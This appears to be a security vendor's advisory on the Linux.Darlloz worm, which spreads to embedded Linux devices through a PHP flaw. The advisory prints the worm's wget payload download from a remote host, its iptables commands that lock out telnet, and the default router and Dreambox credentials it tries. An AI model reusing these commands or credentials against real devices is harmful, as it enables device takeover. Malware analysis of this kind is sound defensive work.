Linux.Darlloz is a worm targetting Linux-based devices. As flavours of this malware exist for embedded devices, it is possible (though not confirmed) that this malware might be targetting Linux-based embedded devices such as Internet of Things devices.
The worm infects hosts using a PHP vulnerability (CVE-2012-1823). This vulnerability has been patched quite a long time ago, but some old not up-to-date devices might still be vulnerable. The vulnerability allows attackers to run arbitrary PHP code on the affected computer.
The attackers have vulnerable hosts download a copy of itself from a remote server:
wget -O /tmp/x86 http://www.[CENSORED]n.de/solar/x86
The sample is then made executable (chmod +x).
Although many samples only download x86 versions of the malware, some samples also download files for different architectures: arm, ppc, mips, mipsel and x86.
The malware loads the ip_tables kernel modules:
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.koand re-creates a rule to make sure telnet connections to the infected device are prevented:
iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROPThe worm also tries to terminate the telnetd process. Finally, the worm will scan other devices on the network and try to connect to them, using the same PHP exploit. If necessary, it provides one of the following default credentials:
admin/admin root/[BLANK] root/root admin/1234 admin/12345 root/admin root/dreambox admin/smcadmin admin/[BLANK]
Based on the default user id / password credentials, we guess that the malware particularly targets SMC ADSL routers Barricade7204BRB and WHSG44G. but also Dreamboxes (TV/satellite reception boxes).
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.